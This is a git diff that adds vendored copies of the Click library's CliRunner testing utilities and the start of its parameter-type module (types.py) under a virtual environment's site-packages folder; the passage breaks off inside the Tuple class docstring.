+ self.exception = exception + #: The traceback + self.exc_info = exc_info + + @property + def output(self) -> str: + """The (standard) output as unicode string.""" + return self.stdout + + @property + def stdout(self) -> str: + """The standard output as unicode string.""" + return self.stdout_bytes.decode(self.runner.charset, "replace").replace( + "\r\n", "\n" + ) + + @property + def stderr(self) -> str: + """The standard error as unicode string.""" + if self.stderr_bytes is None: + raise ValueError("stderr not separately captured") + return self.stderr_bytes.decode(self.runner.charset, "replace").replace( + "\r\n", "\n" + ) + + def __repr__(self) -> str: + exc_str = repr(self.exception) if self.exception else "okay" + return f"<{type(self).__name__} {exc_str}>" + + +class CliRunner: + """The CLI runner provides functionality to invoke a Click command line + script for unittesting purposes in a isolated environment. This only + works in single-threaded systems without any concurrency as it changes the + global interpreter state. + + :param charset: the character set for the input and output data. + :param env: a dictionary with environment variables for overriding. + :param echo_stdin: if this is set to `True`, then reading from stdin writes + to stdout. This is useful for showing examples in + some circumstances. Note that regular prompts + will automatically echo the input. + :param mix_stderr: if this is set to `False`, then stdout and stderr are + preserved as independent streams. This is useful for + Unix-philosophy apps that have predictable stdout and + noisy stderr, such that each may be measured + independently + """ + + def __init__( + self, + charset: str = "utf-8", + env: t.Optional[t.Mapping[str, t.Optional[str]]] = None, + echo_stdin: bool = False, + mix_stderr: bool = True, + ) -> None: + self.charset = charset + self.env: t.Mapping[str, t.Optional[str]] = env or {} + self.echo_stdin = echo_stdin + self.mix_stderr = mix_stderr + + def get_default_prog_name(self, cli: "BaseCommand") -> str: + """Given a command object it will return the default program name + for it. The default is the `name` attribute or ``"root"`` if not + set. + """ + return cli.name or "root" + + def make_env( + self, overrides: t.Optional[t.Mapping[str, t.Optional[str]]] = None + ) -> t.Mapping[str, t.Optional[str]]: + """Returns the environment overrides for invoking a script.""" + rv = dict(self.env) + if overrides: + rv.update(overrides) + return rv + + @contextlib.contextmanager + def isolation( + self, + input: t.Optional[t.Union[str, bytes, t.IO[t.Any]]] = None, + env: t.Optional[t.Mapping[str, t.Optional[str]]] = None, + color: bool = False, + ) -> t.Iterator[t.Tuple[io.BytesIO, t.Optional[io.BytesIO]]]: + """A context manager that sets up the isolation for invoking of a + command line tool. This sets up stdin with the given input data + and `os.environ` with the overrides from the given dictionary. + This also rebinds some internals in Click to be mocked (like the + prompt functionality). + + This is automatically done in the :meth:`invoke` method. + + :param input: the input stream to put into sys.stdin. + :param env: the environment overrides as dictionary. + :param color: whether the output should contain color codes. The + application can still override this explicitly. + + .. versionchanged:: 8.0 + ``stderr`` is opened with ``errors="backslashreplace"`` + instead of the default ``"strict"``. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. 
+ """ + bytes_input = make_input_stream(input, self.charset) + echo_input = None + + old_stdin = sys.stdin + old_stdout = sys.stdout + old_stderr = sys.stderr + old_forced_width = formatting.FORCED_WIDTH + formatting.FORCED_WIDTH = 80 + + env = self.make_env(env) + + bytes_output = io.BytesIO() + + if self.echo_stdin: + bytes_input = echo_input = t.cast( + t.BinaryIO, EchoingStdin(bytes_input, bytes_output) + ) + + sys.stdin = text_input = _NamedTextIOWrapper( + bytes_input, encoding=self.charset, name="", mode="r" + ) + + if self.echo_stdin: + # Force unbuffered reads, otherwise TextIOWrapper reads a + # large chunk which is echoed early. + text_input._CHUNK_SIZE = 1 # type: ignore + + sys.stdout = _NamedTextIOWrapper( + bytes_output, encoding=self.charset, name="", mode="w" + ) + + bytes_error = None + if self.mix_stderr: + sys.stderr = sys.stdout + else: + bytes_error = io.BytesIO() + sys.stderr = _NamedTextIOWrapper( + bytes_error, + encoding=self.charset, + name="", + mode="w", + errors="backslashreplace", + ) + + @_pause_echo(echo_input) # type: ignore + def visible_input(prompt: t.Optional[str] = None) -> str: + sys.stdout.write(prompt or "") + val = text_input.readline().rstrip("\r\n") + sys.stdout.write(f"{val}\n") + sys.stdout.flush() + return val + + @_pause_echo(echo_input) # type: ignore + def hidden_input(prompt: t.Optional[str] = None) -> str: + sys.stdout.write(f"{prompt or ''}\n") + sys.stdout.flush() + return text_input.readline().rstrip("\r\n") + + @_pause_echo(echo_input) # type: ignore + def _getchar(echo: bool) -> str: + char = sys.stdin.read(1) + + if echo: + sys.stdout.write(char) + + sys.stdout.flush() + return char + + default_color = color + + def should_strip_ansi( + stream: t.Optional[t.IO[t.Any]] = None, color: t.Optional[bool] = None + ) -> bool: + if color is None: + return not default_color + return not color + + old_visible_prompt_func = termui.visible_prompt_func + old_hidden_prompt_func = termui.hidden_prompt_func + old__getchar_func = termui._getchar + old_should_strip_ansi = utils.should_strip_ansi # type: ignore + termui.visible_prompt_func = visible_input + termui.hidden_prompt_func = hidden_input + termui._getchar = _getchar + utils.should_strip_ansi = should_strip_ansi # type: ignore + + old_env = {} + try: + for key, value in env.items(): + old_env[key] = os.environ.get(key) + if value is None: + try: + del os.environ[key] + except Exception: + pass + else: + os.environ[key] = value + yield (bytes_output, bytes_error) + finally: + for key, value in old_env.items(): + if value is None: + try: + del os.environ[key] + except Exception: + pass + else: + os.environ[key] = value + sys.stdout = old_stdout + sys.stderr = old_stderr + sys.stdin = old_stdin + termui.visible_prompt_func = old_visible_prompt_func + termui.hidden_prompt_func = old_hidden_prompt_func + termui._getchar = old__getchar_func + utils.should_strip_ansi = old_should_strip_ansi # type: ignore + formatting.FORCED_WIDTH = old_forced_width + + def invoke( + self, + cli: "BaseCommand", + args: t.Optional[t.Union[str, t.Sequence[str]]] = None, + input: t.Optional[t.Union[str, bytes, t.IO[t.Any]]] = None, + env: t.Optional[t.Mapping[str, t.Optional[str]]] = None, + catch_exceptions: bool = True, + color: bool = False, + **extra: t.Any, + ) -> Result: + """Invokes a command in an isolated environment. The arguments are + forwarded directly to the command line script, the `extra` keyword + arguments are passed to the :meth:`~clickpkg.Command.main` function of + the command. 
+ + This returns a :class:`Result` object. + + :param cli: the command to invoke + :param args: the arguments to invoke. It may be given as an iterable + or a string. When given as string it will be interpreted + as a Unix shell command. More details at + :func:`shlex.split`. + :param input: the input data for `sys.stdin`. + :param env: the environment overrides. + :param catch_exceptions: Whether to catch any other exceptions than + ``SystemExit``. + :param extra: the keyword arguments to pass to :meth:`main`. + :param color: whether the output should contain color codes. The + application can still override this explicitly. + + .. versionchanged:: 8.0 + The result object has the ``return_value`` attribute with + the value returned from the invoked command. + + .. versionchanged:: 4.0 + Added the ``color`` parameter. + + .. versionchanged:: 3.0 + Added the ``catch_exceptions`` parameter. + + .. versionchanged:: 3.0 + The result object has the ``exc_info`` attribute with the + traceback if available. + """ + exc_info = None + with self.isolation(input=input, env=env, color=color) as outstreams: + return_value = None + exception: t.Optional[BaseException] = None + exit_code = 0 + + if isinstance(args, str): + args = shlex.split(args) + + try: + prog_name = extra.pop("prog_name") + except KeyError: + prog_name = self.get_default_prog_name(cli) + + try: + return_value = cli.main(args=args or (), prog_name=prog_name, **extra) + except SystemExit as e: + exc_info = sys.exc_info() + e_code = t.cast(t.Optional[t.Union[int, t.Any]], e.code) + + if e_code is None: + e_code = 0 + + if e_code != 0: + exception = e + + if not isinstance(e_code, int): + sys.stdout.write(str(e_code)) + sys.stdout.write("\n") + e_code = 1 + + exit_code = e_code + + except Exception as e: + if not catch_exceptions: + raise + exception = e + exit_code = 1 + exc_info = sys.exc_info() + finally: + sys.stdout.flush() + stdout = outstreams[0].getvalue() + if self.mix_stderr: + stderr = None + else: + stderr = outstreams[1].getvalue() # type: ignore + + return Result( + runner=self, + stdout_bytes=stdout, + stderr_bytes=stderr, + return_value=return_value, + exit_code=exit_code, + exception=exception, + exc_info=exc_info, # type: ignore + ) + + @contextlib.contextmanager + def isolated_filesystem( + self, temp_dir: t.Optional[t.Union[str, "os.PathLike[str]"]] = None + ) -> t.Iterator[str]: + """A context manager that creates a temporary directory and + changes the current working directory to it. This isolates tests + that affect the contents of the CWD to prevent them from + interfering with each other. + + :param temp_dir: Create the temporary directory under this + directory. If given, the created directory is not removed + when exiting. + + .. versionchanged:: 8.0 + Added the ``temp_dir`` parameter. 
+ """ + cwd = os.getcwd() + dt = tempfile.mkdtemp(dir=temp_dir) + os.chdir(dt) + + try: + yield dt + finally: + os.chdir(cwd) + + if temp_dir is None: + try: + shutil.rmtree(dt) + except OSError: # noqa: B014 + pass diff --git a/env/Lib/site-packages/click/types.py b/env/Lib/site-packages/click/types.py new file mode 100644 index 00000000..2b1d1797 --- /dev/null +++ b/env/Lib/site-packages/click/types.py @@ -0,0 +1,1089 @@ +import os +import stat +import sys +import typing as t +from datetime import datetime +from gettext import gettext as _ +from gettext import ngettext + +from ._compat import _get_argv_encoding +from ._compat import open_stream +from .exceptions import BadParameter +from .utils import format_filename +from .utils import LazyFile +from .utils import safecall + +if t.TYPE_CHECKING: + import typing_extensions as te + from .core import Context + from .core import Parameter + from .shell_completion import CompletionItem + + +class ParamType: + """Represents the type of a parameter. Validates and converts values + from the command line or Python into the correct type. + + To implement a custom type, subclass and implement at least the + following: + + - The :attr:`name` class attribute must be set. + - Calling an instance of the type with ``None`` must return + ``None``. This is already implemented by default. + - :meth:`convert` must convert string values to the correct type. + - :meth:`convert` must accept values that are already the correct + type. + - It must be able to convert a value if the ``ctx`` and ``param`` + arguments are ``None``. This can occur when converting prompt + input. + """ + + is_composite: t.ClassVar[bool] = False + arity: t.ClassVar[int] = 1 + + #: the descriptive name of this type + name: str + + #: if a list of this type is expected and the value is pulled from a + #: string environment variable, this is what splits it up. `None` + #: means any whitespace. For all parameters the general rule is that + #: whitespace splits them up. The exception are paths and files which + #: are split by ``os.path.pathsep`` by default (":" on Unix and ";" on + #: Windows). + envvar_list_splitter: t.ClassVar[t.Optional[str]] = None + + def to_info_dict(self) -> t.Dict[str, t.Any]: + """Gather information that could be useful for a tool generating + user-facing documentation. + + Use :meth:`click.Context.to_info_dict` to traverse the entire + CLI structure. + + .. versionadded:: 8.0 + """ + # The class name without the "ParamType" suffix. + param_type = type(self).__name__.partition("ParamType")[0] + param_type = param_type.partition("ParameterType")[0] + + # Custom subclasses might not remember to set a name. + if hasattr(self, "name"): + name = self.name + else: + name = param_type + + return {"param_type": param_type, "name": name} + + def __call__( + self, + value: t.Any, + param: t.Optional["Parameter"] = None, + ctx: t.Optional["Context"] = None, + ) -> t.Any: + if value is not None: + return self.convert(value, param, ctx) + + def get_metavar(self, param: "Parameter") -> t.Optional[str]: + """Returns the metavar default for this param if it provides one.""" + + def get_missing_message(self, param: "Parameter") -> t.Optional[str]: + """Optionally might return extra information about a missing + parameter. + + .. versionadded:: 2.0 + """ + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + """Convert the value to the correct type. This is not called if + the value is ``None`` (the missing value). 
+ + This must accept string values from the command line, as well as + values that are already the correct type. It may also convert + other compatible types. + + The ``param`` and ``ctx`` arguments may be ``None`` in certain + situations, such as when converting prompt input. + + If the value cannot be converted, call :meth:`fail` with a + descriptive message. + + :param value: The value to convert. + :param param: The parameter that is using this type to convert + its value. May be ``None``. + :param ctx: The current context that arrived at this value. May + be ``None``. + """ + return value + + def split_envvar_value(self, rv: str) -> t.Sequence[str]: + """Given a value from an environment variable this splits it up + into small chunks depending on the defined envvar list splitter. + + If the splitter is set to `None`, which means that whitespace splits, + then leading and trailing whitespace is ignored. Otherwise, leading + and trailing splitters usually lead to empty items being included. + """ + return (rv or "").split(self.envvar_list_splitter) + + def fail( + self, + message: str, + param: t.Optional["Parameter"] = None, + ctx: t.Optional["Context"] = None, + ) -> "t.NoReturn": + """Helper method to fail with an invalid value message.""" + raise BadParameter(message, ctx=ctx, param=param) + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Return a list of + :class:`~click.shell_completion.CompletionItem` objects for the + incomplete value. Most types do not provide completions, but + some do, and this allows custom types to provide custom + completions as well. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. 
versionadded:: 8.0 + """ + return [] + + +class CompositeParamType(ParamType): + is_composite = True + + @property + def arity(self) -> int: # type: ignore + raise NotImplementedError() + + +class FuncParamType(ParamType): + def __init__(self, func: t.Callable[[t.Any], t.Any]) -> None: + self.name: str = func.__name__ + self.func = func + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["func"] = self.func + return info_dict + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + try: + return self.func(value) + except ValueError: + try: + value = str(value) + except UnicodeError: + value = value.decode("utf-8", "replace") + + self.fail(value, param, ctx) + + +class UnprocessedParamType(ParamType): + name = "text" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + return value + + def __repr__(self) -> str: + return "UNPROCESSED" + + +class StringParamType(ParamType): + name = "text" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + if isinstance(value, bytes): + enc = _get_argv_encoding() + try: + value = value.decode(enc) + except UnicodeError: + fs_enc = sys.getfilesystemencoding() + if fs_enc != enc: + try: + value = value.decode(fs_enc) + except UnicodeError: + value = value.decode("utf-8", "replace") + else: + value = value.decode("utf-8", "replace") + return value + return str(value) + + def __repr__(self) -> str: + return "STRING" + + +class Choice(ParamType): + """The choice type allows a value to be checked against a fixed set + of supported values. All of these values have to be strings. + + You should only pass a list or tuple of choices. Other iterables + (like generators) may lead to surprising results. + + The resulting value will always be one of the originally passed choices + regardless of ``case_sensitive`` or any ``ctx.token_normalize_func`` + being specified. + + See :ref:`choice-opts` for an example. + + :param case_sensitive: Set to false to make choices case + insensitive. Defaults to true. + """ + + name = "choice" + + def __init__(self, choices: t.Sequence[str], case_sensitive: bool = True) -> None: + self.choices = choices + self.case_sensitive = case_sensitive + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["choices"] = self.choices + info_dict["case_sensitive"] = self.case_sensitive + return info_dict + + def get_metavar(self, param: "Parameter") -> str: + choices_str = "|".join(self.choices) + + # Use curly braces to indicate a required argument. + if param.required and param.param_type_name == "argument": + return f"{{{choices_str}}}" + + # Use square braces to indicate an option or optional argument. 
+ return f"[{choices_str}]" + + def get_missing_message(self, param: "Parameter") -> str: + return _("Choose from:\n\t{choices}").format(choices=",\n\t".join(self.choices)) + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + # Match through normalization and case sensitivity + # first do token_normalize_func, then lowercase + # preserve original `value` to produce an accurate message in + # `self.fail` + normed_value = value + normed_choices = {choice: choice for choice in self.choices} + + if ctx is not None and ctx.token_normalize_func is not None: + normed_value = ctx.token_normalize_func(value) + normed_choices = { + ctx.token_normalize_func(normed_choice): original + for normed_choice, original in normed_choices.items() + } + + if not self.case_sensitive: + normed_value = normed_value.casefold() + normed_choices = { + normed_choice.casefold(): original + for normed_choice, original in normed_choices.items() + } + + if normed_value in normed_choices: + return normed_choices[normed_value] + + choices_str = ", ".join(map(repr, self.choices)) + self.fail( + ngettext( + "{value!r} is not {choice}.", + "{value!r} is not one of {choices}.", + len(self.choices), + ).format(value=value, choice=choices_str, choices=choices_str), + param, + ctx, + ) + + def __repr__(self) -> str: + return f"Choice({list(self.choices)})" + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Complete choices that start with the incomplete value. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + str_choices = map(str, self.choices) + + if self.case_sensitive: + matched = (c for c in str_choices if c.startswith(incomplete)) + else: + incomplete = incomplete.lower() + matched = (c for c in str_choices if c.lower().startswith(incomplete)) + + return [CompletionItem(c) for c in matched] + + +class DateTime(ParamType): + """The DateTime type converts date strings into `datetime` objects. + + The format strings which are checked are configurable, but default to some + common (non-timezone aware) ISO 8601 formats. + + When specifying *DateTime* formats, you should only pass a list or a tuple. + Other iterables, like generators, may lead to surprising results. + + The format strings are processed using ``datetime.strptime``, and this + consequently defines the format strings which are allowed. + + Parsing is tried using each format, in order, and the first format which + parses successfully is used. + + :param formats: A list or tuple of date format strings, in the order in + which they should be tried. Defaults to + ``'%Y-%m-%d'``, ``'%Y-%m-%dT%H:%M:%S'``, + ``'%Y-%m-%d %H:%M:%S'``. 
+ """ + + name = "datetime" + + def __init__(self, formats: t.Optional[t.Sequence[str]] = None): + self.formats: t.Sequence[str] = formats or [ + "%Y-%m-%d", + "%Y-%m-%dT%H:%M:%S", + "%Y-%m-%d %H:%M:%S", + ] + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict["formats"] = self.formats + return info_dict + + def get_metavar(self, param: "Parameter") -> str: + return f"[{'|'.join(self.formats)}]" + + def _try_to_convert_date(self, value: t.Any, format: str) -> t.Optional[datetime]: + try: + return datetime.strptime(value, format) + except ValueError: + return None + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + if isinstance(value, datetime): + return value + + for format in self.formats: + converted = self._try_to_convert_date(value, format) + + if converted is not None: + return converted + + formats_str = ", ".join(map(repr, self.formats)) + self.fail( + ngettext( + "{value!r} does not match the format {format}.", + "{value!r} does not match the formats {formats}.", + len(self.formats), + ).format(value=value, format=formats_str, formats=formats_str), + param, + ctx, + ) + + def __repr__(self) -> str: + return "DateTime" + + +class _NumberParamTypeBase(ParamType): + _number_class: t.ClassVar[t.Type[t.Any]] + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + try: + return self._number_class(value) + except ValueError: + self.fail( + _("{value!r} is not a valid {number_type}.").format( + value=value, number_type=self.name + ), + param, + ctx, + ) + + +class _NumberRangeBase(_NumberParamTypeBase): + def __init__( + self, + min: t.Optional[float] = None, + max: t.Optional[float] = None, + min_open: bool = False, + max_open: bool = False, + clamp: bool = False, + ) -> None: + self.min = min + self.max = max + self.min_open = min_open + self.max_open = max_open + self.clamp = clamp + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update( + min=self.min, + max=self.max, + min_open=self.min_open, + max_open=self.max_open, + clamp=self.clamp, + ) + return info_dict + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + import operator + + rv = super().convert(value, param, ctx) + lt_min: bool = self.min is not None and ( + operator.le if self.min_open else operator.lt + )(rv, self.min) + gt_max: bool = self.max is not None and ( + operator.ge if self.max_open else operator.gt + )(rv, self.max) + + if self.clamp: + if lt_min: + return self._clamp(self.min, 1, self.min_open) # type: ignore + + if gt_max: + return self._clamp(self.max, -1, self.max_open) # type: ignore + + if lt_min or gt_max: + self.fail( + _("{value} is not in the range {range}.").format( + value=rv, range=self._describe_range() + ), + param, + ctx, + ) + + return rv + + def _clamp(self, bound: float, dir: "te.Literal[1, -1]", open: bool) -> float: + """Find the valid value to clamp to bound in the given + direction. + + :param bound: The boundary value. + :param dir: 1 or -1 indicating the direction to move. + :param open: If true, the range does not include the bound. 
+ """ + raise NotImplementedError + + def _describe_range(self) -> str: + """Describe the range for use in help text.""" + if self.min is None: + op = "<" if self.max_open else "<=" + return f"x{op}{self.max}" + + if self.max is None: + op = ">" if self.min_open else ">=" + return f"x{op}{self.min}" + + lop = "<" if self.min_open else "<=" + rop = "<" if self.max_open else "<=" + return f"{self.min}{lop}x{rop}{self.max}" + + def __repr__(self) -> str: + clamp = " clamped" if self.clamp else "" + return f"<{type(self).__name__} {self._describe_range()}{clamp}>" + + +class IntParamType(_NumberParamTypeBase): + name = "integer" + _number_class = int + + def __repr__(self) -> str: + return "INT" + + +class IntRange(_NumberRangeBase, IntParamType): + """Restrict an :data:`click.INT` value to a range of accepted + values. See :ref:`ranges`. + + If ``min`` or ``max`` are not passed, any value is accepted in that + direction. If ``min_open`` or ``max_open`` are enabled, the + corresponding boundary is not included in the range. + + If ``clamp`` is enabled, a value outside the range is clamped to the + boundary instead of failing. + + .. versionchanged:: 8.0 + Added the ``min_open`` and ``max_open`` parameters. + """ + + name = "integer range" + + def _clamp( # type: ignore + self, bound: int, dir: "te.Literal[1, -1]", open: bool + ) -> int: + if not open: + return bound + + return bound + dir + + +class FloatParamType(_NumberParamTypeBase): + name = "float" + _number_class = float + + def __repr__(self) -> str: + return "FLOAT" + + +class FloatRange(_NumberRangeBase, FloatParamType): + """Restrict a :data:`click.FLOAT` value to a range of accepted + values. See :ref:`ranges`. + + If ``min`` or ``max`` are not passed, any value is accepted in that + direction. If ``min_open`` or ``max_open`` are enabled, the + corresponding boundary is not included in the range. + + If ``clamp`` is enabled, a value outside the range is clamped to the + boundary instead of failing. This is not supported if either + boundary is marked ``open``. + + .. versionchanged:: 8.0 + Added the ``min_open`` and ``max_open`` parameters. + """ + + name = "float range" + + def __init__( + self, + min: t.Optional[float] = None, + max: t.Optional[float] = None, + min_open: bool = False, + max_open: bool = False, + clamp: bool = False, + ) -> None: + super().__init__( + min=min, max=max, min_open=min_open, max_open=max_open, clamp=clamp + ) + + if (min_open or max_open) and clamp: + raise TypeError("Clamping is not supported for open bounds.") + + def _clamp(self, bound: float, dir: "te.Literal[1, -1]", open: bool) -> float: + if not open: + return bound + + # Could use Python 3.9's math.nextafter here, but clamping an + # open float range doesn't seem to be particularly useful. It's + # left up to the user to write a callback to do it if needed. 
+ raise RuntimeError("Clamping is not supported for open bounds.") + + +class BoolParamType(ParamType): + name = "boolean" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + if value in {False, True}: + return bool(value) + + norm = value.strip().lower() + + if norm in {"1", "true", "t", "yes", "y", "on"}: + return True + + if norm in {"0", "false", "f", "no", "n", "off"}: + return False + + self.fail( + _("{value!r} is not a valid boolean.").format(value=value), param, ctx + ) + + def __repr__(self) -> str: + return "BOOL" + + +class UUIDParameterType(ParamType): + name = "uuid" + + def convert( + self, value: t.Any, param: t.Optional["Parameter"], ctx: t.Optional["Context"] + ) -> t.Any: + import uuid + + if isinstance(value, uuid.UUID): + return value + + value = value.strip() + + try: + return uuid.UUID(value) + except ValueError: + self.fail( + _("{value!r} is not a valid UUID.").format(value=value), param, ctx + ) + + def __repr__(self) -> str: + return "UUID" + + +class File(ParamType): + """Declares a parameter to be a file for reading or writing. The file + is automatically closed once the context tears down (after the command + finished working). + + Files can be opened for reading or writing. The special value ``-`` + indicates stdin or stdout depending on the mode. + + By default, the file is opened for reading text data, but it can also be + opened in binary mode or for writing. The encoding parameter can be used + to force a specific encoding. + + The `lazy` flag controls if the file should be opened immediately or upon + first IO. The default is to be non-lazy for standard input and output + streams as well as files opened for reading, `lazy` otherwise. When opening a + file lazily for reading, it is still opened temporarily for validation, but + will not be held open until first IO. lazy is mainly useful when opening + for writing to avoid creating the file until it is needed. + + Starting with Click 2.0, files can also be opened atomically in which + case all writes go into a separate file in the same folder and upon + completion the file will be moved over to the original location. This + is useful if a file regularly read by other users is modified. + + See :ref:`file-args` for more information. 
+ """ + + name = "filename" + envvar_list_splitter: t.ClassVar[str] = os.path.pathsep + + def __init__( + self, + mode: str = "r", + encoding: t.Optional[str] = None, + errors: t.Optional[str] = "strict", + lazy: t.Optional[bool] = None, + atomic: bool = False, + ) -> None: + self.mode = mode + self.encoding = encoding + self.errors = errors + self.lazy = lazy + self.atomic = atomic + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update(mode=self.mode, encoding=self.encoding) + return info_dict + + def resolve_lazy_flag(self, value: "t.Union[str, os.PathLike[str]]") -> bool: + if self.lazy is not None: + return self.lazy + if os.fspath(value) == "-": + return False + elif "w" in self.mode: + return True + return False + + def convert( + self, + value: t.Union[str, "os.PathLike[str]", t.IO[t.Any]], + param: t.Optional["Parameter"], + ctx: t.Optional["Context"], + ) -> t.IO[t.Any]: + if _is_file_like(value): + return value + + value = t.cast("t.Union[str, os.PathLike[str]]", value) + + try: + lazy = self.resolve_lazy_flag(value) + + if lazy: + lf = LazyFile( + value, self.mode, self.encoding, self.errors, atomic=self.atomic + ) + + if ctx is not None: + ctx.call_on_close(lf.close_intelligently) + + return t.cast(t.IO[t.Any], lf) + + f, should_close = open_stream( + value, self.mode, self.encoding, self.errors, atomic=self.atomic + ) + + # If a context is provided, we automatically close the file + # at the end of the context execution (or flush out). If a + # context does not exist, it's the caller's responsibility to + # properly close the file. This for instance happens when the + # type is used with prompts. + if ctx is not None: + if should_close: + ctx.call_on_close(safecall(f.close)) + else: + ctx.call_on_close(safecall(f.flush)) + + return f + except OSError as e: # noqa: B014 + self.fail(f"'{format_filename(value)}': {e.strerror}", param, ctx) + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Return a special completion marker that tells the completion + system to use the shell to provide file path completions. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + return [CompletionItem(incomplete, type="file")] + + +def _is_file_like(value: t.Any) -> "te.TypeGuard[t.IO[t.Any]]": + return hasattr(value, "read") or hasattr(value, "write") + + +class Path(ParamType): + """The ``Path`` type is similar to the :class:`File` type, but + returns the filename instead of an open file. Various checks can be + enabled to validate the type of file and permissions. + + :param exists: The file or directory needs to exist for the value to + be valid. If this is not set to ``True``, and the file does not + exist, then all further checks are silently skipped. + :param file_okay: Allow a file as a value. + :param dir_okay: Allow a directory as a value. + :param readable: if true, a readable check is performed. + :param writable: if true, a writable check is performed. + :param executable: if true, an executable check is performed. + :param resolve_path: Make the value absolute and resolve any + symlinks. A ``~`` is not expanded, as this is supposed to be + done by the shell only. 
+ :param allow_dash: Allow a single dash as a value, which indicates + a standard stream (but does not open it). Use + :func:`~click.open_file` to handle opening this value. + :param path_type: Convert the incoming path value to this type. If + ``None``, keep Python's default, which is ``str``. Useful to + convert to :class:`pathlib.Path`. + + .. versionchanged:: 8.1 + Added the ``executable`` parameter. + + .. versionchanged:: 8.0 + Allow passing ``path_type=pathlib.Path``. + + .. versionchanged:: 6.0 + Added the ``allow_dash`` parameter. + """ + + envvar_list_splitter: t.ClassVar[str] = os.path.pathsep + + def __init__( + self, + exists: bool = False, + file_okay: bool = True, + dir_okay: bool = True, + writable: bool = False, + readable: bool = True, + resolve_path: bool = False, + allow_dash: bool = False, + path_type: t.Optional[t.Type[t.Any]] = None, + executable: bool = False, + ): + self.exists = exists + self.file_okay = file_okay + self.dir_okay = dir_okay + self.readable = readable + self.writable = writable + self.executable = executable + self.resolve_path = resolve_path + self.allow_dash = allow_dash + self.type = path_type + + if self.file_okay and not self.dir_okay: + self.name: str = _("file") + elif self.dir_okay and not self.file_okay: + self.name = _("directory") + else: + self.name = _("path") + + def to_info_dict(self) -> t.Dict[str, t.Any]: + info_dict = super().to_info_dict() + info_dict.update( + exists=self.exists, + file_okay=self.file_okay, + dir_okay=self.dir_okay, + writable=self.writable, + readable=self.readable, + allow_dash=self.allow_dash, + ) + return info_dict + + def coerce_path_result( + self, value: "t.Union[str, os.PathLike[str]]" + ) -> "t.Union[str, bytes, os.PathLike[str]]": + if self.type is not None and not isinstance(value, self.type): + if self.type is str: + return os.fsdecode(value) + elif self.type is bytes: + return os.fsencode(value) + else: + return t.cast("os.PathLike[str]", self.type(value)) + + return value + + def convert( + self, + value: "t.Union[str, os.PathLike[str]]", + param: t.Optional["Parameter"], + ctx: t.Optional["Context"], + ) -> "t.Union[str, bytes, os.PathLike[str]]": + rv = value + + is_dash = self.file_okay and self.allow_dash and rv in (b"-", "-") + + if not is_dash: + if self.resolve_path: + # os.path.realpath doesn't resolve symlinks on Windows + # until Python 3.8. Use pathlib for now. 
+ import pathlib + + rv = os.fsdecode(pathlib.Path(rv).resolve()) + + try: + st = os.stat(rv) + except OSError: + if not self.exists: + return self.coerce_path_result(rv) + self.fail( + _("{name} {filename!r} does not exist.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if not self.file_okay and stat.S_ISREG(st.st_mode): + self.fail( + _("{name} {filename!r} is a file.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + if not self.dir_okay and stat.S_ISDIR(st.st_mode): + self.fail( + _("{name} '{filename}' is a directory.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if self.readable and not os.access(rv, os.R_OK): + self.fail( + _("{name} {filename!r} is not readable.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if self.writable and not os.access(rv, os.W_OK): + self.fail( + _("{name} {filename!r} is not writable.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + if self.executable and not os.access(value, os.X_OK): + self.fail( + _("{name} {filename!r} is not executable.").format( + name=self.name.title(), filename=format_filename(value) + ), + param, + ctx, + ) + + return self.coerce_path_result(rv) + + def shell_complete( + self, ctx: "Context", param: "Parameter", incomplete: str + ) -> t.List["CompletionItem"]: + """Return a special completion marker that tells the completion + system to use the shell to provide path completions for only + directories or any paths. + + :param ctx: Invocation context for this command. + :param param: The parameter that is requesting completion. + :param incomplete: Value being completed. May be empty. + + .. versionadded:: 8.0 + """ + from click.shell_completion import CompletionItem + + type = "dir" if self.dir_okay and not self.file_okay else "file" + return [CompletionItem(incomplete, type=type)] + + +class Tuple(CompositeParamType): + """The default behavior of Click is to apply a type on a value directly. + This works well in most cases, except for when `nargs` is set to a fixed + count and different types should be used for different items. In this + case the :class:`Tuple` type can be used. This type can only be used + if `nargs` is set to a fixed number. + + For more information see :ref:`tuple-type`. + + This can be selected by 